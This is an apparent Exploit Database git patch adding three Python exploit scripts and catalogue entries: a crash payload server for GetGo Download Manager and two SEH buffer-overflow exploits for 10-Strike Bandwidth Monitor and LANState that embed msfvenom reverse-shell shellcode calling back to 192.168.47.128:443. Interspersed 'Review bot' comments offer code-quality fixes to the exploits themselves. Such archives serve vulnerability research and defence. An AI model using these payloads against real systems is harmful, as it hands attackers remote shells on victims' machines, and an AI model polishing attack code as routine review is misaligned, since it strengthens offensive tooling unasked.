From ed985d30e0340d8d25e3cca6a040a05d44be6f01 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 26 Jul 2018 05:01:45 +0000 Subject: [PATCH] DB: 2018-07-26 3 changes to exploits/shellcodes PoDoFo 0.9.5 - Buffer Overflow PoDoFo 0.9.5 - Buffer Overflow (PoC) Windows Speech Recognition - Buffer Overflow Windows Speech Recognition - Buffer Overflow (PoC) GetGo Download Manager 6.2.1.3200 - Denial of Service (PoC) 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH) 10-Strike LANState 8.8 - Local Buffer Overflow (SEH) D-link DAP-1360 - Path Traversal / Cross-Site Scripting --- exploits/windows/dos/45087.py | 47 +++++++ exploits/windows/local/45085.py | 61 +++++++++ exploits/windows/local/45086.py | 227 ++++++++++++++++++++++++++++++++ files_exploits.csv | 9 +- 4 files changed, 341 insertions(+), 3 deletions(-) create mode 100755 exploits/windows/dos/45087.py create mode 100755 exploits/windows/local/45085.py create mode 100755 exploits/windows/local/45086.py diff --git a/exploits/windows/dos/45087.py b/exploits/windows/dos/45087.py new file mode 100755 index 000000000..4aff96beb --- /dev/null +++ b/exploits/windows/dos/45087.py 
@@ -0,0 +1,47 @@ +# Exploit Title: GetGo Download Manager 6.2.1.3200 - Buffer Overflow (Denial of Service) +# Date: 2018-07-25 +# Exploit Author: Nathu Nandwani +# Website: http://nandtech.co +# CVE: CVE-2017-17849 +# Tested On: Windows 7 x86, Windows 10 x64 +# +# Details +# +# The downloader feature of GetGo Download Manager is vulnerable +# to a buffer overflow which can cause a denial of service. +# To test the proof of concept, have it executed in your machine +# and let the GetGo application download 'index.html' from your +# given IP. +# +# SEH details (Windows 7 x86): +# +# SEH chain of thread 00000644, item 1 +# Address=0863E2C8 +# SE handler=68463967 <-> 4108 offset +# +# SEH chain of thread 00000644, item 2 +# Address=46386746 <-> 4104 offset +# SE handler=*** CORRUPT ENTRY *** + +import socket + +server_ip = "0.0.0.0" +server_port = 80 +payload = "A" * 4104 + "BBBB" + "\xcc\xcc\xcc\xcc" + "D" * 11000 + "\r\n" + +sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +sock.bind((server_ip, server_port)) +sock.listen(1) + +print "Currently listening at " + server_ip + ":" + str(server_port) + +client, (client_host, client_port) = sock.accept() +print "Client connected: " + client_host + ":" + str(client_port) +print "" +print client.recv(1000) + +client.send(payload) +print "Sent payload" + +client.close() +sock.close() \ No newline at end of file diff --git a/exploits/windows/local/45085.py b/exploits/windows/local/45085.py new file mode 100755 index 000000000..219c4c2af --- /dev/null +++ b/exploits/windows/local/45085.py 
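Review bot: The listener in 45087.py binds `server_ip = "0.0.0.0"` on port 80, so it is reachable on every interface of the test machine and answers whichever client connects first. Taking the bind address as a parameter with a loopback or lab-only default (`server_ip = "127.0.0.1"` when the client under test runs on the same host) keeps the test confined to the intended machine. The closing `client.close()` / `sock.close()` pair is skipped if `accept`, `recv` or `send` raises, which leaves port 80 held; wrapping the exchange in `try`/`finally` releases it. The file is also added with mode 100755 but has no `#!` line, and its `print "..."` statements need Python 2, which the header does not say; a `# Requires: Python 2` comment would cover that.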
@@ -0,0 +1,61 @@ +# Title: 10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow SEH +# Date: 2018-07-24 +# Exploit Author: absolomb +# Vendor Homepage: https://www.10-strike.com/products.shtml +# Software Link: https://www.10-strike.com/bandwidth-monitor/download.shtml +# Run script, open up generated txt file and copy to clipboard +# Open Bandwith Monitor, Enter my key, Paste code from clipboard, hit OK, boom shell. +# Or from inside the app you can go to the Help tab, click Registration and Paste code from clipboard, hit OK, boom shell. + +#!/usr/bin/python + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -b '\x00\x0a\x0d' -f python -v shellcode +shellcode = "" +shellcode += "\xbb\x03\xe2\x9b\xb7\xda\xc3\xd9\x74\x24\xf4\x5e" +shellcode += "\x29\xc9\xb1\x52\x31\x5e\x12\x83\xc6\x04\x03\x5d" +shellcode += "\xec\x79\x42\x9d\x18\xff\xad\x5d\xd9\x60\x27\xb8" +shellcode += "\xe8\xa0\x53\xc9\x5b\x11\x17\x9f\x57\xda\x75\x0b" +shellcode += "\xe3\xae\x51\x3c\x44\x04\x84\x73\x55\x35\xf4\x12" +shellcode += "\xd5\x44\x29\xf4\xe4\x86\x3c\xf5\x21\xfa\xcd\xa7" +shellcode += "\xfa\x70\x63\x57\x8e\xcd\xb8\xdc\xdc\xc0\xb8\x01" +shellcode += "\x94\xe3\xe9\x94\xae\xbd\x29\x17\x62\xb6\x63\x0f" +shellcode += "\x67\xf3\x3a\xa4\x53\x8f\xbc\x6c\xaa\x70\x12\x51" +shellcode += "\x02\x83\x6a\x96\xa5\x7c\x19\xee\xd5\x01\x1a\x35" +shellcode += "\xa7\xdd\xaf\xad\x0f\x95\x08\x09\xb1\x7a\xce\xda" +shellcode += "\xbd\x37\x84\x84\xa1\xc6\x49\xbf\xde\x43\x6c\x6f" +shellcode += "\x57\x17\x4b\xab\x33\xc3\xf2\xea\x99\xa2\x0b\xec" +shellcode += "\x41\x1a\xae\x67\x6f\x4f\xc3\x2a\xf8\xbc\xee\xd4" +shellcode += "\xf8\xaa\x79\xa7\xca\x75\xd2\x2f\x67\xfd\xfc\xa8" +shellcode += "\x88\xd4\xb9\x26\x77\xd7\xb9\x6f\xbc\x83\xe9\x07" +shellcode += "\x15\xac\x61\xd7\x9a\x79\x25\x87\x34\xd2\x86\x77" +shellcode += "\xf5\x82\x6e\x9d\xfa\xfd\x8f\x9e\xd0\x95\x3a\x65" +shellcode += "\xb3\x59\x12\x4a\xc3\x32\x61\x94\xc2\x79\xec\x72" +shellcode += "\xae\x6d\xb9\x2d\x47\x17\xe0\xa5\xf6\xd8\x3e\xc0" 
+shellcode += "\x39\x52\xcd\x35\xf7\x93\xb8\x25\x60\x54\xf7\x17" +shellcode += "\x27\x6b\x2d\x3f\xab\xfe\xaa\xbf\xa2\xe2\x64\xe8" +shellcode += "\xe3\xd5\x7c\x7c\x1e\x4f\xd7\x62\xe3\x09\x10\x26" +shellcode += "\x38\xea\x9f\xa7\xcd\x56\x84\xb7\x0b\x56\x80\xe3" +shellcode += "\xc3\x01\x5e\x5d\xa2\xfb\x10\x37\x7c\x57\xfb\xdf" +shellcode += "\xf9\x9b\x3c\x99\x05\xf6\xca\x45\xb7\xaf\x8a\x7a" +shellcode += "\x78\x38\x1b\x03\x64\xd8\xe4\xde\x2c\xe8\xae\x42" +shellcode += "\x04\x61\x77\x17\x14\xec\x88\xc2\x5b\x09\x0b\xe6" +shellcode += "\x23\xee\x13\x83\x26\xaa\x93\x78\x5b\xa3\x71\x7e" +shellcode += "\xc8\xc4\x53" + +# JMP always true +nseh = '\x71\x06\x70\x04' + +# 0x01174647 POP POP RET BandMonitor.exe +seh = '\x47\x46\x17\x01' + +payload = '\x41' * 4188 +payload += nseh +payload += seh +payload += shellcode +payload += '\x41' * (1804 - len(shellcode)) + +file = open('sploit.txt','w') +print "Size: " + str(len(payload)) + " bytes" +file.write(payload) +file.close() +print "TXT file created!" \ No newline at end of file diff --git a/exploits/windows/local/45086.py b/exploits/windows/local/45086.py new file mode 100755 index 000000000..4dcc0f7ab --- /dev/null +++ b/exploits/windows/local/45086.py 
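Review bot: The `#!/usr/bin/python` line in 45085.py sits after the header comments and a blank line instead of on line 1, so it is an ordinary comment and the 100755 mode has no interpreter line to go with it; 45086.py has the same layout. Move it to the first line, or drop it and name the interpreter in the header, since the `print "..."` statements need Python 2. The output handle is bound to `file`, which shadows the Python 2 builtin and is not closed if `write` raises; `with open('sploit.txt', 'w') as out:` fixes both, and the same applies to `sploit.lsm` in 45086.py. The header comment also misspells the product name as "Bandwith Monitor".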
@@ -0,0 +1,227 @@ +# Exploit Title: 10-Strike LANState 8.8 - Local Buffer Overflow (SEH) +# Date: 2018-07-24 +# Exploit Author: absolomb +# Vendor Homepage: https://www.10-strike.com/products.shtml +# Software Link: https://www.10-strike.com/lanstate/download.shtml +# Version 8.8 +# Tested on: Windows 7 SP 1 x86 + +# Open LANState, File -> Open, browse to generated lsm file, boom shell. +# If it doesn't work first try, close the tab at the bottom and reopen the file + +#!/usr/bin/python + +lsm = """[VERSION INFO] +PROG_NAME=LANState +PROG_VER=8.85 +MAP_VER=8.3 +MAPID=584636991 + +[OBJECT#4] +index=4 +ObjName= +ObjCaption={0} +ObjHint= +ObjLink= +POS_X=100 +POS_Y=0 +Width=65 +Height=65 +ImageWidth=31 +ImageHeight=32 +StdImageIndex=1 +ImageFilePath= +FontName=Arial +FontColor=0 +FontSize=8 +FontCharset=1 +FontStyle=0 +TextAlignment=2 +TextLayout=0 +ObjType=1 +OBJ_ID=1 +TYPE_ID=2 +IP= +REMOTE_NAME=A +MAP_NAME= +MAC_ADDR= +OS= +SNMPAgent=0 +SNMPVer=1 +SNMPUname= +SNMPPassw= +SNMPPrivPassw= +SNMPSecLevel=0 +SNMPAuthType=0 +SNMPPrivType=0 +Community= +ALWAYS_ON=0 +ImageEnabled=0 +ImageFile= +IPList= +CurrentUser= +DESCRIPT= +CheckInterval=60 +DownTime1=0 +DownTime1Start=12:00:00 AM +DownTime1Finish=12:00:00 AM +DownTime2=0 +DownTime2Start=12:00:00 AM +DownTime2Finish=12:00:00 AM +DownTime3=0 +DownTime3Start=12:00:00 AM +DownTime3Finish=12:00:00 AM +DownTime4=0 +DownTime4Start=12:00:00 AM +DownTime4Finish=12:00:00 AM +DownTime5=0 +DownTime5Start=12:00:00 AM +DownTime5Finish=12:00:00 AM +DownTime6=0 +DownTime6Start=12:00:00 AM +DownTime6Finish=12:00:00 AM +DownTime7=0 +DownTime7Start=12:00:00 AM +DownTime7Finish=12:00:00 AM +DTDoNotAlert=1 +RunFirstOnly=0 +FirstIsPassed=1 +CHECK#0/HostAddr={0} +CHECK#0/CID=1 +CHECK#0/NumRetries=1 +CHECK#0/RetInterval=30 +CHECK#0/IsMainCheck=0 +CHECK#0/KeepStat=1 +CHECK#0/CheckType=0 +CHECK#0/CheckOn=1 +CHECK#0/CheckRTTime=0 +CHECK#0/RTTime=1000 +CHECK#0/PacketsCount=4 +CHECK#0/TimeOut=500 +CHECK#0/SizeBuf=32 + +[VIEW] +FonImage=0 
+FonImageFile= +ImagePosition=0 +ImageOffsetX=16 +ImageOffsetY=16 +ImgW=0 +ImgH=0 +ImgAutoSize=1 +ScaleFactor=1 +ScrollX=0 +ScrollY=0 +BkGroundColor=16777215 +FontName=Arial +FontColor=-16777208 +FontSize=8 +FontCharset=1 +FontStyle=0 +Gradient=0 +Color1=15780518 +Color2=16777215 +WebUseSmallIcons=0 +CurIconSize=32 +LockAreas=0 +LockLines=0 +LockHosts=0 +WindowState=2 +WindowTop=-10 +WindowsLeft=12 +WindowWidth=800 +WindowsHeight=600 + +""" + +# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.47.128 LPORT=443 -e x86/alpha_mixed BufferRegister=EDI -f python -v shellcode +shellcode = "" +shellcode += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +shellcode += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" +shellcode += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +shellcode += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +shellcode += "\x42\x75\x4a\x49\x49\x6c\x6b\x58\x4f\x72\x57\x70" +shellcode += "\x47\x70\x77\x70\x75\x30\x6c\x49\x69\x75\x45\x61" +shellcode += "\x4b\x70\x71\x74\x4c\x4b\x62\x70\x64\x70\x4e\x6b" +shellcode += "\x62\x72\x54\x4c\x6e\x6b\x71\x42\x65\x44\x4c\x4b" +shellcode += "\x70\x72\x34\x68\x64\x4f\x4d\x67\x62\x6a\x76\x46" +shellcode += "\x56\x51\x79\x6f\x6e\x4c\x65\x6c\x75\x31\x71\x6c" +shellcode += "\x44\x42\x74\x6c\x61\x30\x59\x51\x7a\x6f\x64\x4d" +shellcode += "\x47\x71\x58\x47\x49\x72\x6a\x52\x66\x32\x62\x77" +shellcode += "\x6e\x6b\x50\x52\x56\x70\x6e\x6b\x53\x7a\x77\x4c" +shellcode += "\x4c\x4b\x50\x4c\x46\x71\x73\x48\x38\x63\x62\x68" +shellcode += "\x37\x71\x78\x51\x30\x51\x6e\x6b\x73\x69\x75\x70" +shellcode += "\x67\x71\x78\x53\x4e\x6b\x77\x39\x64\x58\x68\x63" +shellcode += "\x75\x6a\x37\x39\x4c\x4b\x55\x64\x4e\x6b\x35\x51" +shellcode += "\x6a\x76\x74\x71\x6b\x4f\x6c\x6c\x6f\x31\x7a\x6f" +shellcode += "\x56\x6d\x75\x51\x4a\x67\x75\x68\x4d\x30\x30\x75" +shellcode += "\x78\x76\x43\x33\x53\x4d\x68\x78\x37\x4b\x61\x6d" +shellcode += "\x65\x74\x44\x35\x4a\x44\x30\x58\x4c\x4b\x62\x78" +shellcode += 
"\x31\x34\x35\x51\x4b\x63\x31\x76\x6c\x4b\x46\x6c" +shellcode += "\x72\x6b\x6e\x6b\x66\x38\x35\x4c\x35\x51\x6b\x63" +shellcode += "\x6c\x4b\x74\x44\x6c\x4b\x53\x31\x78\x50\x6e\x69" +shellcode += "\x73\x74\x44\x64\x35\x74\x43\x6b\x63\x6b\x51\x71" +shellcode += "\x32\x79\x50\x5a\x73\x61\x79\x6f\x79\x70\x31\x4f" +shellcode += "\x33\x6f\x51\x4a\x6e\x6b\x45\x42\x7a\x4b\x4c\x4d" +shellcode += "\x43\x6d\x73\x58\x57\x43\x67\x42\x55\x50\x43\x30" +shellcode += "\x51\x78\x42\x57\x42\x53\x66\x52\x71\x4f\x66\x34" +shellcode += "\x45\x38\x72\x6c\x73\x47\x57\x56\x37\x77\x49\x6f" +shellcode += "\x7a\x75\x68\x38\x7a\x30\x43\x31\x43\x30\x33\x30" +shellcode += "\x36\x49\x4a\x64\x73\x64\x62\x70\x30\x68\x44\x69" +shellcode += "\x4d\x50\x30\x6b\x37\x70\x69\x6f\x59\x45\x62\x70" +shellcode += "\x42\x70\x76\x30\x30\x50\x61\x50\x62\x70\x57\x30" +shellcode += "\x46\x30\x51\x78\x78\x6a\x54\x4f\x49\x4f\x6b\x50" +shellcode += "\x6b\x4f\x4a\x75\x4a\x37\x53\x5a\x57\x75\x42\x48" +shellcode += "\x39\x50\x69\x38\x36\x4f\x4b\x30\x50\x68\x34\x42" +shellcode += "\x65\x50\x65\x51\x4d\x6b\x6c\x49\x39\x76\x33\x5a" +shellcode += "\x36\x70\x72\x76\x76\x37\x31\x78\x7a\x39\x4d\x75" +shellcode += "\x52\x54\x61\x71\x59\x6f\x79\x45\x6b\x35\x39\x50" +shellcode += "\x62\x54\x34\x4c\x39\x6f\x50\x4e\x77\x78\x62\x55" +shellcode += "\x78\x6c\x53\x58\x48\x70\x4c\x75\x39\x32\x76\x36" +shellcode += "\x59\x6f\x58\x55\x70\x68\x53\x53\x52\x4d\x62\x44" +shellcode += "\x43\x30\x4e\x69\x6a\x43\x71\x47\x71\x47\x61\x47" +shellcode += "\x64\x71\x39\x66\x50\x6a\x34\x52\x33\x69\x42\x76" +shellcode += "\x38\x62\x4b\x4d\x51\x76\x4a\x67\x51\x54\x75\x74" +shellcode += "\x47\x4c\x56\x61\x46\x61\x6c\x4d\x37\x34\x57\x54" +shellcode += "\x54\x50\x7a\x66\x65\x50\x42\x64\x50\x54\x52\x70" +shellcode += "\x73\x66\x71\x46\x31\x46\x37\x36\x32\x76\x42\x6e" +shellcode += "\x33\x66\x71\x46\x62\x73\x61\x46\x32\x48\x50\x79" +shellcode += "\x38\x4c\x45\x6f\x4d\x56\x6b\x4f\x79\x45\x4f\x79" +shellcode += 
"\x49\x70\x52\x6e\x62\x76\x37\x36\x4b\x4f\x34\x70" +shellcode += "\x65\x38\x57\x78\x6e\x67\x65\x4d\x35\x30\x69\x6f" +shellcode += "\x58\x55\x4d\x6b\x5a\x50\x4f\x45\x69\x32\x33\x66" +shellcode += "\x42\x48\x6d\x76\x6c\x55\x4d\x6d\x4f\x6d\x49\x6f" +shellcode += "\x4a\x75\x75\x6c\x43\x36\x63\x4c\x67\x7a\x6f\x70" +shellcode += "\x6b\x4b\x6b\x50\x43\x45\x56\x65\x6f\x4b\x43\x77" +shellcode += "\x62\x33\x73\x42\x72\x4f\x33\x5a\x55\x50\x63\x63" +shellcode += "\x79\x6f\x6e\x35\x41\x41" + +align_stack = '\x58' # POP EAX +align_stack += '\x58' # POP EAX +align_stack += '\x05\x61\x55\x55\x55' # ADD EAX,55555561 +align_stack += '\x05\x61\x55\x55\x55' # ADD EAX,55555561 +align_stack += '\x05\x62\x56\x55\x55' # ADD EAX,55555662 +align_stack += '\x50' # PUSH EAX +align_stack += '\x5f' # POP EDI + +# JMP always true +nseh = '\x71\x06\x70\x04' + +#01BA7647 POP POP RET LANState.exe +seh = '\x47\x76\xba\x01' + +payload = '\x41' * 235 +payload += nseh +payload += seh +payload += align_stack +payload += '\x41' * 265 +payload += shellcode +payload += '\x41' * (3492 -len(shellcode + align_stack)) + +buffer = lsm.format(payload) + +file = open('sploit.lsm','w') +print "Size: " + str(len(payload)) + " bytes" +file.write(buffer) +file.close() +print "Map file created!" \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 2f62d6227..14e23e315 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
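Review bot: The size message in 45086.py prints `len(payload)`, but the file written is `buffer`, the map template with `payload` substituted at both `{0}` fields (`ObjCaption` and `CHECK#0/HostAddr`), so the number shown is not the size of `sploit.lsm`. Print `len(buffer)` or label the figure as the per-field length. The header says `# Version 8.8` while the embedded template carries `PROG_VER=8.85`, and no comment records which build was tested or which of the two fields is the one being overflowed; one line stating both would help anyone validating a vendor fix. Here and in 45085.py the `shellcode` string is an opaque byte blob whose only provenance is the `msfvenom` command in the comment above it, so a comment marking the bytes as unverified would help whoever triages the file.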
@@ -5988,7 +5988,7 @@ id,file,description,date,author,type,platform,port
 44821,exploits/multiple/dos/44821.txt,"Epiphany 3.28.2.1 - Denial of Service",2018-06-01,"Dhiraj Mishra",dos,multiple,
 44832,exploits/linux/dos/44832.txt,"Linux Kernel < 4.16.11 - 'ext4_read_inline_data()' Memory Corruption",2018-06-05,"Google Security Research",dos,linux,
 44944,exploits/linux/dos/44944.txt,"KVM (Nested Virtualization) - L1 Guest Privilege Escalation",2018-06-25,"Google Security Research",dos,linux,
-44946,exploits/linux/dos/44946.txt,"PoDoFo 0.9.5 - Buffer Overflow",2018-06-26,r4xis,dos,linux,
+44946,exploits/linux/dos/44946.txt,"PoDoFo 0.9.5 - Buffer Overflow (PoC)",2018-06-26,r4xis,dos,linux,
 44846,exploits/php/dos/44846.txt,"PHP 7.2.2 - 'php_stream_url_wrap_http_ex' Buffer Overflow",2018-06-06,"Wei Lei and Liu Yang",dos,php,
 44847,exploits/macos/dos/44847.c,"Apple macOS Kernel - Use-After-Free Due to Lack of Locking in nvidia GeForce Driver",2018-06-06,"Google Security Research",dos,macos,
 44848,exploits/multiple/dos/44848.c,"Apple macOS/iOS Kernel - Heap Overflow Due to Lack of Lower Size Check in getvolattrlist",2018-06-06,"Google Security Research",dos,multiple,
@@ -6024,7 +6024,8 @@ id,file,description,date,author,type,platform,port
 45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple,
 45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware,
 45082,exploits/linux/dos/45082.txt,"Nagios Core 4.4.1 - Denial of Service",2018-07-24,"Fakhri Zulkifli",dos,linux,
-45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow",2018-07-23,"Nassim Asrir",dos,windows,
+45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows,
+45087,exploits/windows/dos/45087.py,"GetGo Download Manager 6.2.1.3200 - Denial of Service (PoC)",2018-07-25,"Nathu Nandwani",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -9827,6 +9828,8 @@ id,file,description,date,author,type,platform,port
 45048,exploits/multiple/local/45048.js,"JavaScript Core - Arbitrary Code Execution",2018-07-11,ret2,local,multiple,
 45058,exploits/linux/local/45058.rb,"Linux - BPF Sign Extension Local Privilege Escalation (Metasploit)",2018-07-19,Metasploit,local,linux,
 45071,exploits/windows/local/45071.py,"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)",2018-07-23,bzyo,local,windows,
+45085,exploits/windows/local/45085.py,"10-Strike Bandwidth Monitor 3.7 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
+45086,exploits/windows/local/45086.py,"10-Strike LANState 8.8 - Local Buffer Overflow (SEH)",2018-07-25,absolomb,local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39701,4 +39704,4 @@ id,file,description,date,author,type,platform,port
 45070,exploits/hardware/webapps/45070.txt,"NUUO NVRmini - 'upgrade_handle.php' Remote Command Execution",2018-07-23,"Berk Dusunur",webapps,hardware,
 45076,exploits/hardware/webapps/45076.py,"Davolink DVW 3200 Router - Password Disclosure",2018-07-23,"Ankit Anubhav",webapps,hardware,
 45078,exploits/hardware/webapps/45078.py,"Tenda Wireless N150 Router 5.07.50 - Cross-Site Request Forgery (Reboot Router)",2018-07-23,"Nathu Nandwani",webapps,hardware,80
-45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,
+45084,exploits/hardware/webapps/45084.txt,"D-link DAP-1360 - Path Traversal / Cross-Site Scripting",2018-07-24,r3m0t3nu11,webapps,hardware,80